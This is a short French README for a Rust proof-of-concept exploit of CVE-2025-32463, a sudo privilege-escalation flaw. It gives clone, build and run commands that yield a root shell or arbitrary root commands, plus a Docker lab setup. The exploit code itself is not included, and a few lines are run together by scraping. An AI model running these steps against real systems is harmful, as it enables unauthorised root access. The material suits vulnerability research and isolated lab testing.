
Exploit de preuve de concept basé sur Rust pour CVE-2025-32463, une vulnérabilité d'élévation de privilèges dans Sudo. Lance un shell racine interactif ou exécute des commandes arbitraires en tant que root.
git clone https://github.com/krypton-0x00/CVE-2025-32463-Chwoot-POC.git
cd CVE-2025-32463-Chwoot-POC
./exploit
git clone https://github.com/krypton-0x00/CVE-2025-32463-Chwoot-POC.git
cd CVE-2025-32463-Chwoot-POC
cargo build --release
Le binaire compilé se trouvera à :
./target/release/CVE-2025-32463-Chwoot-POC
Exécutez le binaire de l'exploit avec des arguments de commande optionnels :
sudo ./target/release/CVE-2025-32463-Chwoot-POC
id) :sudo ./target/release/CVE-2025-32463-Chwoot-POC "id"
Sinon, utilisez le conteneur Docker fourni pour un environnement vulnérable isolé avec toutes les dépendances installées.
docker build -t sudo-chwoot .
sudo docker images)docker run --rm -it --privileged sudo-chwoot
cd /home/pwn/CVE-2025-32463-Rust-POC
./target/release/CVE-2025-32463-Chwoot-POC